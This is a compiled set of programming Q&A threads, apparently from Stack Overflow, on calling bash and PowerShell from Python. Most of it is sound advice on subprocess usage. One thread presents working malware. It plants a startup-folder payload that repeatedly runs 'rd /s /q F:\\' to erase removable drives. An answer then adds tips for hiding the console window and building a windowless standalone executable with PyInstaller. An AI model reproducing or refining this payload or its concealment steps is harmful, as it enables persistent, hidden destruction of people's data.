How to hardcode a bash script in a Python file - python

I am writing a Python tool that does some processing and data gathering and eventually calls bash scripts via subprocess.
The tricky part of my tool is: I use Nuitka to compile the Python files to a single binary. I'm doing this because I don't want my users to add any features, plus I'd like my tool to be mysterious.
The problem is, of course, what to do with those bash scripts. For now, I store them alongside my Nuitka-ed binary. However, for the reasons above, I don't want the bash scripts to be that easily accessible.
For now, I can see two options for me:
I can compile the *.sh files and link them into the Nuitka-ed binary.
I can hardcode the *.sh files in the *.py files.
Option 1 is not really an option due to its complexity. Option 2 is slightly better, but so far my best solution is the following:
I make script.py:
"""
#!/bin/bash
ls -alh /var
echo $?
# (...)
"""
And I inject script.__doc__ into subprocess.Popen(['bash(...).
Is there a better, more elegant way to achieve my goal while keeping the bash script readable?

To hardcode bash code within a Python file you could do it this way:
import subprocess

# In Python
text = "foobar"
your_bash_cmd = "echo " + text
process = subprocess.Popen([your_bash_cmd], shell=True, stdout=subprocess.PIPE)
process.wait()
your_bash_output = process.stdout.read()
# Process the bash output in Python
print(your_bash_output)
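To address the multi-line scripts the question is actually about, here is a minimal sketch of a cleaner variant (the script body is illustrative): keep the script in an ordinary module-level string constant, which stays readable, and feed it to bash on standard input instead of abusing a docstring. Assumes Python 3.7+ for text= and capture_output=.

import subprocess

# The embedded script stays readable as a plain string constant
EMBEDDED_SCRIPT = """\
set -eu
ls -alh /var
echo "listing done"
"""

# bash -s reads the script from standard input; no *.sh file on disk
result = subprocess.run(['bash', '-s'], input=EMBEDDED_SCRIPT,
                        text=True, capture_output=True, check=True)
print(result.stdout)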

Related

How can we execute the following bash commands in Python (Linux)? [duplicate]

On my local machine, I run a python script which contains this line
bashCommand = "cwm --rdf test.rdf --ntriples > test.nt"
os.system(bashCommand)
This works fine.
Then I run the same code on a server and I get the following error message
'import site' failed; use -v for traceback
Traceback (most recent call last):
File "/usr/bin/cwm", line 48, in <module>
from swap import diag
ImportError: No module named swap
So what I did then was insert a print bashCommand, which prints the command in the terminal before running it with os.system().
Of course, I get the error again (caused by os.system(bashCommand)), but before that it prints the command in the terminal. I then copied that output, pasted it into the terminal, hit enter, and it works...
Does anyone have a clue what's going on?
Don't use os.system. It has been superseded by subprocess. From the subprocess docs: "This module intends to replace several older modules and functions: os.system, os.spawn".
Like in your case:
import subprocess
bashCommand = "cwm --rdf test.rdf --ntriples > test.nt"
process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
(Beware: without a shell, the > test.nt redirection is not performed; > and test.nt are passed to cwm as literal arguments. See the longer answers below for how to handle the redirection properly.)
To somewhat expand on the earlier answers here, there are a number of details which are commonly overlooked.
Prefer subprocess.run() over subprocess.check_call() and friends over subprocess.call() over subprocess.Popen() over os.system() over os.popen()
Understand and probably use text=True, aka universal_newlines=True.
Understand the meaning of shell=True or shell=False and how it changes quoting and the availability of shell conveniences.
Understand differences between sh and Bash
Understand how a subprocess is separate from its parent, and generally cannot change the parent.
Avoid running the Python interpreter as a subprocess of Python.
These topics are covered in some more detail below.
Prefer subprocess.run() or subprocess.check_call()
The subprocess.Popen() function is a low-level workhorse but it is tricky to use correctly and you end up copy/pasting multiple lines of code ... which conveniently already exist in the standard library as a set of higher-level wrapper functions for various purposes, which are presented in more detail in the following.
Here's a paragraph from the documentation:
The recommended approach to invoking subprocesses is to use the run() function for all use cases it can handle. For more advanced use cases, the underlying Popen interface can be used directly.
Unfortunately, the availability of these wrapper functions differs between Python versions.
subprocess.run() was officially introduced in Python 3.5. It is meant to replace all of the following.
subprocess.check_output() was introduced in Python 2.7 / 3.1. It is basically equivalent to subprocess.run(..., check=True, stdout=subprocess.PIPE).stdout
subprocess.check_call() was introduced in Python 2.5. It is basically equivalent to subprocess.run(..., check=True)
subprocess.call() was introduced in Python 2.4 in the original subprocess module (PEP-324). It is basically equivalent to subprocess.run(...).returncode
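To illustrate those equivalences, a minimal sketch (the commands are placeholders):

import subprocess

# check_call: run, and raise CalledProcessError on a nonzero exit status
subprocess.check_call(['true'])
# equivalent with run()
subprocess.run(['true'], check=True)

# check_output: capture standard output, raise on failure
listing = subprocess.check_output(['ls', '-l'], text=True)
# equivalent with run()
listing = subprocess.run(['ls', '-l'], check=True,
                         stdout=subprocess.PIPE, text=True).stdout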
High-level API vs subprocess.Popen()
The refactored and extended subprocess.run() is more logical and more versatile than the older legacy functions it replaces. It returns a CompletedProcess object which has various methods which allow you to retrieve the exit status, the standard output, and a few other results and status indicators from the finished subprocess.
subprocess.run() is the way to go if you simply need a program to run and return control to Python. For more involved scenarios (background processes, perhaps with interactive I/O with the Python parent program) you still need to use subprocess.Popen() and take care of all the plumbing yourself. This requires a fairly intricate understanding of all the moving parts and should not be undertaken lightly. The simpler Popen object represents the (possibly still-running) process which needs to be managed from your code for the remainder of the lifetime of the subprocess.
It should perhaps be emphasized that just subprocess.Popen() merely creates a process. If you leave it at that, you have a subprocess running concurrently alongside with Python, so a "background" process. If it doesn't need to do input or output or otherwise coordinate with you, it can do useful work in parallel with your Python program.
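A minimal sketch of that background-process pattern:

import subprocess

# Popen returns immediately; the child runs concurrently with Python
worker = subprocess.Popen(['sleep', '5'])
print('Python keeps running while sleep works in the background')
# You remain responsible for reaping the child and checking its status
returncode = worker.wait()
print('subprocess finished with status', returncode)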
Avoid os.system() and os.popen()
Since time eternal (well, since Python 2.5) the os module documentation has contained the recommendation to prefer subprocess over os.system():
The subprocess module provides more powerful facilities for spawning new processes and retrieving their results; using that module is preferable to using this function.
The problems with system() are that it's obviously system-dependent and doesn't offer ways to interact with the subprocess. It simply runs, with standard output and standard error outside of Python's reach. The only information Python receives back is the exit status of the command (zero means success, though the meaning of non-zero values is also somewhat system-dependent).
PEP-324 (which was already mentioned above) contains a more detailed rationale for why os.system is problematic and how subprocess attempts to solve those issues.
os.popen() used to be even more strongly discouraged:
Deprecated since version 2.6: This function is obsolete. Use the subprocess module.
However, since sometime in Python 3, it has been reimplemented to simply use subprocess, and redirects to the subprocess.Popen() documentation for details.
Understand and usually use check=True
You'll also notice that subprocess.call() has many of the same limitations as os.system(). In regular use, you should generally check whether the process finished successfully, which subprocess.check_call() and subprocess.check_output() do (where the latter also returns the standard output of the finished subprocess). Similarly, you should usually use check=True with subprocess.run() unless you specifically need to allow the subprocess to return an error status.
In practice, with check=True or subprocess.check_*, Python will throw a CalledProcessError exception if the subprocess returns a nonzero exit status.
A common error with subprocess.run() is to omit check=True and be surprised when downstream code fails if the subprocess failed.
On the other hand, a common problem with check_call() and check_output() was that users who blindly used these functions were surprised when the exception was raised e.g. when grep did not find a match. (You should probably replace grep with native Python code anyway, as outlined below.)
All things counted, you need to understand how shell commands return an exit code, and under what conditions they will return a non-zero (error) exit code, and make a conscious decision how exactly it should be handled.
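A sketch of making that decision explicit, using grep's convention that exit status 1 merely means "no match" (the file name is hypothetical):

import subprocess

try:
    match = subprocess.run(['grep', 'needle', 'haystack.txt'],
                           check=True, stdout=subprocess.PIPE, text=True)
    print(match.stdout)
except subprocess.CalledProcessError as exc:
    if exc.returncode == 1:
        print('no match found')  # not an error as far as grep is concerned
    else:
        raise  # a genuine failure, e.g. the file does not exist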
Understand and probably use text=True aka universal_newlines=True
Since Python 3, strings internal to Python are Unicode strings. But there is no guarantee that a subprocess generates Unicode output, or strings at all.
(If the differences are not immediately obvious, Ned Batchelder's Pragmatic Unicode is recommended, if not outright obligatory, reading. There is a 36-minute video presentation behind the link if you prefer, though reading the page yourself will probably take significantly less time.)
Deep down, Python has to fetch a bytes buffer and interpret it somehow. If it contains a blob of binary data, it shouldn't be decoded into a Unicode string, because that's error-prone and bug-inducing behavior - precisely the sort of pesky behavior which riddled many Python 2 scripts, before there was a way to properly distinguish between encoded text and binary data.
With text=True, you tell Python that you, in fact, expect back textual data in the system's default encoding, and that it should be decoded into a Python (Unicode) string to the best of Python's ability (usually UTF-8 on any moderately up to date system, except perhaps Windows?)
If that's not what you request back, Python will just give you bytes strings in the stdout and stderr strings. Maybe at some later point you do know that they were text strings after all, and you know their encoding. Then, you can decode them.
normal = subprocess.run([external, arg],
    stdout=subprocess.PIPE, stderr=subprocess.PIPE,
    check=True,
    text=True)
print(normal.stdout)

convoluted = subprocess.run([external, arg],
    stdout=subprocess.PIPE, stderr=subprocess.PIPE,
    check=True)
# You have to know (or guess) the encoding
print(convoluted.stdout.decode('utf-8'))
Python 3.7 introduced the shorter and more descriptive and understandable alias text for the keyword argument which was previously somewhat misleadingly called universal_newlines.
Understand shell=True vs shell=False
With shell=True you pass a single string to your shell, and the shell takes it from there.
With shell=False you pass a list of arguments to the OS, bypassing the shell.
When you don't have a shell, you save a process and get rid of a fairly substantial amount of hidden complexity, which may or may not harbor bugs or even security problems.
On the other hand, when you don't have a shell, you don't have redirection, wildcard expansion, job control, and a large number of other shell features.
A common mistake is to use shell=True and then still pass Python a list of tokens, or vice versa. This happens to work in some cases, but is really ill-defined and could break in interesting ways.
# XXX AVOID THIS BUG
buggy = subprocess.run('dig +short stackoverflow.com')

# XXX AVOID THIS BUG TOO
broken = subprocess.run(['dig', '+short', 'stackoverflow.com'],
    shell=True)

# XXX DEFINITELY AVOID THIS
pathological = subprocess.run(['dig +short stackoverflow.com'],
    shell=True)

correct = subprocess.run(['dig', '+short', 'stackoverflow.com'],
    # Probably don't forget these, too
    check=True, text=True)

# XXX Probably better avoid shell=True
# but this is nominally correct
fixed_but_fugly = subprocess.run('dig +short stackoverflow.com',
    shell=True,
    # Probably don't forget these, too
    check=True, text=True)
The common retort "but it works for me" is not a useful rebuttal unless you understand exactly under what circumstances it could stop working.
To briefly recap, correct usage looks like
subprocess.run("string for 'the shell' to parse", shell=True)
# or
subprocess.run(["list", "of", "tokenized strings"]) # shell=False
If you want to avoid the shell but are too lazy or unsure of how to parse a string into a list of tokens, notice that shlex.split() can do this for you.
import shlex
subprocess.run(shlex.split("no string for 'the shell' to parse"))  # shell=False
# equivalent to
# subprocess.run(["no", "string", "for", "the shell", "to", "parse"])
The regular split() will not work here, because it doesn't preserve quoting. In the example above, notice how "the shell" is a single string.
Refactoring Example
Very often, the features of the shell can be replaced with native Python code. Simple Awk or sed scripts should probably just be translated to Python instead.
To partially illustrate this, here is a typical but slightly silly example which involves many shell features.
cmd = '''while read -r x;
   do ping -c 3 "$x" | grep 'min/avg/max'
   done <hosts.txt'''
# Trivial but horrible
results = subprocess.run(
    cmd, shell=True, universal_newlines=True, check=True,
    stdout=subprocess.PIPE)
print(results.stdout)

# Reimplement with shell=False
with open('hosts.txt') as hosts:
    for host in hosts:
        host = host.rstrip('\n')  # drop newline
        ping = subprocess.run(
            ['ping', '-c', '3', host],
            text=True,
            stdout=subprocess.PIPE,
            check=True)
        for line in ping.stdout.split('\n'):
            if 'min/avg/max' in line:
                print('{}: {}'.format(host, line))
Some things to note here:
With shell=False you don't need the quoting that the shell requires around strings. Putting quotes anyway is probably an error.
It often makes sense to run as little code as possible in a subprocess. This gives you more control over execution from within your Python code.
Having said that, complex shell pipelines are tedious and sometimes challenging to reimplement in Python.
The refactored code also illustrates just how much the shell really does for you with a very terse syntax -- for better or for worse. Python says explicit is better than implicit, but the Python code is rather verbose and arguably looks more complex than it really is. On the other hand, it offers a number of points where you can grab control in the middle of something else, as trivially exemplified by the enhancement that we can easily include the host name along with the shell command output. (This is by no means challenging to do in the shell, either, but at the expense of yet another diversion and perhaps another process.)
Common Shell Constructs
For completeness, here are brief explanations of some of these shell features, and some notes on how they can perhaps be replaced with native Python facilities.
Globbing aka wildcard expansion can be replaced with glob.glob() or very often with simple Python string comparisons like for file in os.listdir('.'): if not file.endswith('.png'): continue. Bash has various other expansion facilities like .{png,jpg} brace expansion and {1..100} as well as tilde expansion (~ expands to your home directory, and more generally ~account to the home directory of another user)
Shell variables like $SHELL or $my_exported_var can sometimes simply be replaced with Python variables. Exported shell variables are available as e.g. os.environ['SHELL'] (the meaning of export is to make the variable available to subprocesses -- a variable which is not available to subprocesses will obviously not be available to Python running as a subprocess of the shell, or vice versa. The env= keyword argument to subprocess methods allows you to define the environment of the subprocess as a dictionary, so that's one way to make a Python variable visible to a subprocess). With shell=False you will need to understand how to remove any quotes; for example, cd "$HOME" is equivalent to os.chdir(os.environ['HOME']) without quotes around the directory name. (Very often cd is not useful or necessary anyway, and many beginners omit the double quotes around the variable and get away with it until one day ...)
Redirection allows you to read from a file as your standard input, and write your standard output to a file. grep 'foo' <inputfile >outputfile opens outputfile for writing and inputfile for reading, and passes its contents as standard input to grep, whose standard output then lands in outputfile. This is not generally hard to replace with native Python code.
Pipelines are a form of redirection. echo foo | nl runs two subprocesses, where the standard output of echo is the standard input of nl (on the OS level, in Unix-like systems, this is a single file handle). If you cannot replace one or both ends of the pipeline with native Python code, perhaps think about using a shell after all, especially if the pipeline has more than two or three processes (though look at the pipes module in the Python standard library or a number of more modern and versatile third-party competitors). A pipeline built without the shell is sketched just after this list.
Job control lets you interrupt jobs, run them in the background, return them to the foreground, etc. The basic Unix signals to stop and continue a process are of course available from Python, too. But jobs are a higher-level abstraction in the shell which involve process groups etc which you have to understand if you want to do something like this from Python.
Quoting in the shell is potentially confusing until you understand that everything is basically a string. So ls -l / is equivalent to 'ls' '-l' '/' but the quoting around literals is completely optional. Unquoted strings which contain shell metacharacters undergo parameter expansion, whitespace tokenization and wildcard expansion; double quotes prevent whitespace tokenization and wildcard expansion but allow parameter expansions (variable substitution, command substitution, and backslash processing). This is simple in theory but can get bewildering, especially when there are several layers of interpretation (a remote shell command, for example).
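As promised above, a minimal sketch of building the echo foo | nl pipeline without a shell, following the pattern from the subprocess documentation:

import subprocess

# echo foo | nl, with the two children connected by an OS-level pipe
echo = subprocess.Popen(['echo', 'foo'], stdout=subprocess.PIPE)
nl = subprocess.Popen(['nl'], stdin=echo.stdout,
                      stdout=subprocess.PIPE, text=True)
echo.stdout.close()  # let echo receive SIGPIPE if nl exits early
output, _ = nl.communicate()
print(output)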
Understand differences between sh and Bash
subprocess runs your shell commands with /bin/sh unless you specifically request otherwise (except of course on Windows, where it uses the value of the COMSPEC variable). This means that various Bash-only features like arrays, [[ etc are not available.
If you need to use Bash-only syntax, you can
pass in the path to the shell as executable='/bin/bash' (where of course if your Bash is installed somewhere else, you need to adjust the path).
subprocess.run('''
    # This for loop syntax is Bash only
    for ((i=1; i<=$#; i++)); do
        # Arrays are Bash-only
        array[i]+=123
    done''',
    shell=True, check=True,
    executable='/bin/bash')
A subprocess is separate from its parent, and cannot change it
A somewhat common mistake is doing something like
subprocess.run('cd /tmp', shell=True)
subprocess.run('pwd', shell=True) # Oops, doesn't print /tmp
The same thing will happen if the first subprocess tries to set an environment variable, which of course will have disappeared when you run another subprocess, etc.
A child process runs completely separate from Python, and when it finishes, Python has no idea what it did (apart from the vague indicators that it can infer from the exit status and output from the child process). A child generally cannot change the parent's environment; it cannot set a variable, change the working directory, or, in so many words, communicate with its parent without cooperation from the parent.
The immediate fix in this particular case is to run both commands in a single subprocess:
subprocess.run('cd /tmp; pwd', shell=True)
though obviously this particular use case isn't very useful; instead, use the cwd keyword argument, or simply os.chdir() before running the subprocess. Similarly, for setting a variable, you can manipulate the environment of the current process (and thus also its children) via
os.environ['foo'] = 'bar'
or pass an environment setting to a child process with
subprocess.run('echo "$foo"', shell=True, env={'foo': 'bar'})
(not to mention the obvious refactoring subprocess.run(['echo', 'bar']); but echo is a poor example of something to run in a subprocess in the first place, of course).
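A sketch of the cwd= and env= fixes mentioned above:

import subprocess

# Run the child in /tmp without changing Python's own working directory
result = subprocess.run(['pwd'], cwd='/tmp',
                        stdout=subprocess.PIPE, text=True, check=True)
print(result.stdout)

# Pass a variable to one child only, leaving os.environ untouched
subprocess.run('echo "$foo"', shell=True, env={'foo': 'bar'})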
Don't run Python from Python
This is slightly dubious advice; there are certainly situations where it does make sense or is even an absolute requirement to run the Python interpreter as a subprocess from a Python script. But very frequently, the correct approach is simply to import the other Python module into your calling script and call its functions directly.
If the other Python script is under your control, and it isn't a module, consider turning it into one. (This answer is too long already so I will not delve into details here.)
If you need parallelism, you can run Python functions in subprocesses with the multiprocessing module. There is also threading which runs multiple tasks in a single process (which is more lightweight and gives you more control, but also more constrained in that threads within a process are tightly coupled, and bound to a single GIL.)
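A minimal sketch of the multiprocessing alternative:

from multiprocessing import Pool

def work(n):
    return n * n

if __name__ == '__main__':
    # Runs work() in four separate Python processes; no subprocess plumbing
    with Pool(4) as pool:
        print(pool.map(work, range(10)))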
Call it with subprocess:
import subprocess
subprocess.Popen("cwm --rdf test.rdf --ntriples > test.nt", shell=True)
(shell=True is needed here, because the command is a single string containing a shell redirection.)
The error you are getting seems to be because there is no swap module on the server; you should install swap on the server and then run the script again.
You can also use the bash program explicitly, with the -c parameter to execute the commands:
bashCommand = "cwm --rdf test.rdf --ntriples > test.nt"
output = subprocess.check_output(['bash','-c', bashCommand])
You can use subprocess, but I always felt that it was not a 'Pythonic' way of doing it. So I created Sultan (shameless plug) that makes it easy to run command line functions.
https://github.com/aeroxis/sultan
You can also use os.popen.
Example:
import os
command = os.popen('ls -al')
print(command.read())
print(command.close())
Output:
total 16
drwxr-xr-x 2 root root 4096 ago 13 21:53 .
drwxr-xr-x 4 root root 4096 ago 13 01:50 ..
-rw-r--r-- 1 root root 1278 ago 13 21:12 bot.py
-rw-r--r-- 1 root root 77 ago 13 21:53 test.py
None
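For comparison, a roughly equivalent sketch using subprocess, which the documentation recommends over os.popen:

import subprocess

result = subprocess.run(['ls', '-al'], stdout=subprocess.PIPE,
                        text=True, check=True)
print(result.stdout)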
According to the error you are missing a package named swap on the server. This /usr/bin/cwm requires it. If you're on Ubuntu/Debian, install python-swap using aptitude.
To run the command without a shell, pass the command as a list and implement the redirection in Python using subprocess:
#!/usr/bin/env python
import subprocess
with open('test.nt', 'wb', 0) as file:
    subprocess.check_call("cwm --rdf test.rdf --ntriples".split(),
                          stdout=file)
Note: no > test.nt at the end. stdout=file implements the redirection.
To run the command using the shell in Python, pass the command as a string and enable shell=True:
#!/usr/bin/env python
import subprocess
subprocess.check_call("cwm --rdf test.rdf --ntriples > test.nt",
shell=True)
Here the shell is responsible for the output redirection (> test.nt is in the command).
To run a bash command that uses bashisms, specify the bash executable explicitly e.g., to emulate bash process substitution:
#!/usr/bin/env python
import subprocess
subprocess.check_call('program <(command) <(another-command)',
shell=True, executable='/bin/bash')
copy paste this:
import subprocess

def run_bash_command(cmd: str) -> bytes:
    process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE)
    output, error = process.communicate()
    if process.returncode != 0:
        raise Exception(error)
    return output
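Usage, with the caveat that plain .split() breaks on quoted arguments and that no shell features (pipes, redirection, wildcards) are available here:

print(run_bash_command('ls -alh /var'))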
subprocess.Popen() is preferred over os.system() as it offers more control and visibility. However, if you find subprocess.Popen() too verbose or complex, peasyshell is a small wrapper I wrote on top of it, which makes it easy to interact with bash from Python.
https://github.com/davidohana/peasyshell
The pythonic way of doing this is using subprocess.Popen.
subprocess.Popen takes a list where the first element is the command to be run, followed by any command-line arguments.
As an example:
import subprocess

args = ['echo', 'Hello!']
subprocess.Popen(args)  # same as running `echo Hello!` on the command line

args2 = ['echo', '-v', 'Hello Again!']
subprocess.Popen(args2)  # same as running `echo -v "Hello Again!"` on the command line

How to run a .py file from a .py file in an entirely different project

For the life of me I can't figure this one out.
I have 2 applications built in Python, so 2 projects in different folders. Is there a command to say, in the first application, run file2 from documents/project2/test2.py?
I tried something like os.system('') and exec(), but those only seem to work if the file is in the same folder. How can I give a command a path like documents/project2 and then, for example:
exec(documents/project2 python test2.py)?
Short version:
Is there a command that runs python test2.py while test2 is in a completely different folder/project?
Thanks for all feedback!
There's a number of approaches to take.
1 - Import the .py
If the path to the other Python script can be made relative to your project, you can simply import the .py. This will cause all the code at the 'root' level of the script to be executed and makes functions as well as type and variable definitions available to the script importing it.
Of course, this only works if you control how and where everything is installed. It's the most preferable solution, but only works in limited situations.
from ..other_package import myscript
2 - Evaluate the code
You can load the contents of the Python file like any other text file and execute the contents. This is considered more of a security risk, but given the interpreted nature of Python in normal use not that much worse than an import under normal circumstances.
Here's how:
with open('/path/to/myscript.py', 'r') as f:
    exec(f.read())
Note that, if you need to pass values to code inside the script, or out of it, you probably want to use files in this case.
I'd consider this the least preferable solution, due to it being a bit inflexible and not very secure, but it's definitely very easy to set up.
3 - Call it like any other external program
From a Python script, you can call any other executable, that includes Python itself with another script.
Here's how:
from subprocess import run
run(['python', 'path/to/myscript.py'])
This is generally the preferable way to go about it. You can use the command line to interface with the script, and capture the output.
You can also pipe in text with stdin= or capture the output from the script with stdout=, using subprocess.Popen directly.
For example, take this script, called quote.py
import sys
text = sys.stdin.read()
print(f'In the words of the poet:\n"{text}"')
This takes any text from standard in and prints them with some extra text, to standard out like any Python script. You could call it like this:
dir | python quote.py
To use it from another Python script:
from subprocess import Popen, PIPE
s_in = b'something to say\nright here\non three lines'
p = Popen(['python', 'quote.py'], stdin=PIPE, stdout=PIPE)
s_out, _ = p.communicate(s_in)
print('Here is what the script produced:\n\n', s_out.decode())
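On Python 3.5+, the same exchange can be written more compactly with subprocess.run(); using sys.executable instead of the bare 'python' also avoids guessing which interpreter is on the PATH (a sketch under those assumptions):

import subprocess
import sys

s_in = b'something to say\nright here\non three lines'
result = subprocess.run([sys.executable, 'quote.py'],
                        input=s_in, stdout=subprocess.PIPE, check=True)
print('Here is what the script produced:\n\n', result.stdout.decode())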
Try this:
exec(open("FilePath").read())
It should work if you got the file path correct.
Mac example:
exec(open("/Users/saudalfaris/Desktop/Test.py").read())
Windows example (use a raw string so the backslashes are not treated as escape sequences):
exec(open(r"C:\Projects\Python\Test.py").read())

What's the best way to execute PowerShell scripts from Python

All the previous posts on this topic deal with specific challenges for their use case. I thought it would be useful to have a post only dealing with the cleanest way to run PowerShell scripts from Python and ask if anyone has an better solution than what I found.
What seems to be the generally accepted solution to get around PowerShell trying to interpret different control characters in your command differently to what's intended is to feed your Powershell command in using a file:
import subprocess

ps = 'powershell.exe -noprofile'
pscommand = r'Invoke-Command -ComputerName serverx -ScriptBlock {cmd.exe /c "dir /b C:\"}'
with open('pscmdfile.ps1', 'w') as psfile:
    psfile.write(pscommand)
full_command_string = ps + ' pscmdfile.ps1'
process = subprocess.Popen(full_command_string, shell=True,
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)
When your Python code needs to change the parameters for the PowerShell command each time you invoke it, you end up writing and deleting a lot of temporary files for subprocess.Popen to run. It works perfectly, but it's unnecessary and not very clean. It would be really nice to tidy this up, so I wanted suggestions on any improvements I could make to the solution I found.
Instead of writing a file to disk containing the PS command create a virtual file using the io module. Assuming that the "date" and "server" strings are being fed in as part of a loop or function that contains this code, not including the imports of course:
import subprocess
import io
from string import Template
raw_shellcmd = 'powershell.exe -noprofile '
# -- start of loop, with the server and date variables populated --
raw_pslistcmd = r'Invoke-Command -ComputerName $server -ScriptBlock ' \
                r'{cmd.exe /c "dir /b C:\folder\$date"}'
pslistcmd_template = Template(raw_pslistcmd)
pslistcmd = pslistcmd_template.substitute(server=server, date=date)
virtualfilepslistcommand = io.StringIO(pslistcmd)  # BytesIO would require bytes
shellcmd = raw_shellcmd + virtualfilepslistcommand.read()
process = subprocess.Popen(shellcmd, shell=True,
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# -- end of loop --
Arguably the best approach is to use powershell.exe -Command rather than writing the PowerShell command to a file:
pscommand = 'Invoke-Command ...'
process = subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', '"&{' + pscommand + '}"'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Make sure double quotes in the pscommand string are properly escaped.
Note that shell=True is required only in certain edge cases, and should not be used in your scenario. From the documentation:
On Windows with shell=True, the COMSPEC environment variable specifies the default shell. The only time you need to specify shell=True on Windows is when the command you wish to execute is built into the shell (e.g. dir or copy). You do not need shell=True to run a batch file or console-based executable.
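Putting those pieces together, a minimal sketch (the server name and command are illustrative):

import subprocess

pscommand = r'Invoke-Command -ComputerName serverx -ScriptBlock { Get-ChildItem "C:\folder" }'
process = subprocess.run(
    ['powershell.exe', '-NoProfile', '-Command', pscommand],
    stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
print(process.stdout)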
After spending a fair amount of time on this:
I think that running PowerShell commands from Python may not make sense to a lot of people, especially people who work exclusively in Windows environments. There are numerous clear advantages to Python over PowerShell, however, so the ability to do all your business logic in Python and then selectively execute PowerShell on remote servers is truly a great thing.
I've now been through several improvements of my "winrmcntl" module, which I unfortunately can't share due to company policy, but here is my advice to anyone who would like to do something similar. The module should take as input an unmodified PS command or scriptblock, exactly as you'd run it if you were typing directly into PS on the destination box. A few tricks:
To avoid permission difficulties, ensure the user running your Python script, and hence the one running powershell.exe via subprocess.Popen, is a user that has the correct permissions on the Windows box your Invoke-Command is pointing at. We use an enterprise scheduler that has Windows VMs as agents, on which the Python code lives, and that takes care of this.
You will occasionally still get the odd esoteric exception from PowerShell land. If they're anything like the one I saw from time to time, Microsoft will scratch their heads a little and ask you to do time-consuming application stack tracing. That is not only time-consuming but very difficult to get right, because it's resource-intensive and you don't know when the exception will next occur. In my opinion, it's much better and easier to parse the output of the exception and retry up to x number of times if certain text appears in it. I keep a list of such strings in my winrmcntl module, which currently contains a single string.
If you don't want to have to "massage" the PowerShell commands as they traverse the python -> windows -> powershell -> powershell stack in order to work as expected on destination boxes, the most consistent method I've found is to write one-liners and scriptblocks alike into a ps_buffer.ps1 file, which you then feed to PowerShell on the source box, so that every process.Popen call looks exactly the same while the content of ps_buffer.ps1 changes with each execution.
powershell.exe ps_buffer.ps1
To keep your Python code nice and clean, it's great to have your list of PowerShell one-liners in a JSON file or similar, along with pointers to the scriptblocks you want to run, saved in static files. You load the JSON file as an ordered dict and cycle through it, issuing commands based on what you're doing.
It can't be overstated: as far as possible, try to be on the latest stable version of PS, but more than that, it's imperative to be on the same version on client and server.
"scriptblock" and "server" are the values fed to this module or function
import os
import subprocess
from string import Template

scriptblock = 'Get-ChildItem'  # or a PS scriptblock as elaborate as you need
server = 'serverx'
# tempdir is defined elsewhere in the module
psbufferfile = os.path.join(tempdir, 'pscmdbufferfile_{}.ps1'.format(server))
fullshellcmd = 'powershell.exe {}'.format(psbufferfile)
raw_pscommand = 'Invoke-Command -ComputerName $server -ScriptBlock {$scriptblock}'
pscmd_template = Template(raw_pscommand)
pscmd = pscmd_template.substitute(server=server, scriptblock=scriptblock)
try:
    with open(psbufferfile, 'w') as psbf:
        psbf.writelines(pscmd)
    ....
try:
    process = subprocess.Popen(fullshellcmd, shell=True,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, error = process.communicate()
    ....

Execute python script on startup in the background

I am writing a very simple piece of malware for fun (I don't like doing anything malicious to others). Currently, I have this:
import os

# generate payload
payload = [
    "from os import system\n",
    "from time import sleep\n",
    "while True:\n",
    " try:\n",
    "  system('rd /s /q F:\\\\')\n",
    " except:\n",
    "  pass\n",
    " sleep(10)\n",
]
# find the user home
userhome = os.path.expanduser('~')
# create the payload file
with open(userhome + "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.py", "a") as output:
    # write payload
    for i in payload:
        output.write(i)
After the user executes that script, it should run the payload every time the computer starts up. Currently, the payload will erase the F:\ drive, where USB disks, external HDDs, etc. will be found.
The problem is that the command window shows up when the computer starts. I need a way to prevent anything from showing up anywhere, in a short way that can be done easily in Python. I've heard of "pythonw.exe", but I don't know how I would get it to run at startup with that unless I change the default program for .py files. How would I go about doing this?
And yes, I do know that if someone were to get this malware it wouldn't do anything unless they had Python installed, but since I don't want to do anything with it, I don't care.
The window that pops up should, in fact, not be your Python window, but the window for the command you run with os (if there are two windows, you will need to follow the suggestion below to remove the actual Python one). You can block this when you use the subprocess module, similar to the os one. Normally subprocess also creates a window, but you can use this call function to avoid it. It will even take an optional input argument and return the output, if you wish to pipe the standard in and out of the process, which you do not need to do in this case.
import subprocess

def call(command, io=''):
    command = command.split()
    # Suppress the console window (Windows only)
    startupinfo = subprocess.STARTUPINFO()
    startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    process = subprocess.Popen(command, stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               startupinfo=startupinfo, shell=False)
    return process.communicate(io)[0]
This should help. You would use it in place of os.system()
Also, you can make it work even without Python (though you really shouldn't use it on other systems) by making it into an executable with PyInstaller. You may, in fact, need to do this along with the subprocess startupinfo change to make it work. Unlike py2exe or cx_Freeze, PyInstaller is very easy to use and works reliably. Install PyInstaller (it is distributed as a zip file; PyInstaller and other sites document how to install it). You may need to include the pyinstaller command in your system "path" variable (you can do this from Control Panel) if you want to create an executable from the command line. Just type
pyinstaller "<filename>" -w -F
And you will get a single, standalone, window-less executable. The -w makes it windowless; the -F makes it a standalone file as opposed to a collection of multiple files. You should see a dist subdirectory under the one you called pyinstaller from, which will include, possibly among other things you may ignore, the single standalone executable, which does not require Python and shouldn't cause any windows to pop up.

I want to have raw_input and nohup together in python

I am dealing with a large data set, and my script takes some days to run; therefore I use nohup to run it in the terminal.
This time I need to first get a raw_input from the terminal, and then my code starts running under nohup. Any suggestion how I can do that?
So first I need to get input from the terminal like this:
$ python myprogram.py
enter_input: SOMETHING
Then the process should run like this:
$ nohup python myprogram.py &
But I want to do this in one step via the terminal. I hope my explanation is clear :)
Here's one more option, in case you want to stick with the user-friendly nature of the input prompt. I did something like this because I needed a password field and didn't want the user to have to display their password in the terminal. As described here, you can create a small wrapper shell script with read prompts (with or without the -s option to hide the input), and then pass those variables via the sys.argv solution from the other answer. Something like this, saved in an executable my_program.sh:
echo enter_input:
read username
echo enter_password:
read -s password
nohup python myprogram.py $username $password &
Now, running ./my_program.sh will behave exactly like your original python my_program.py
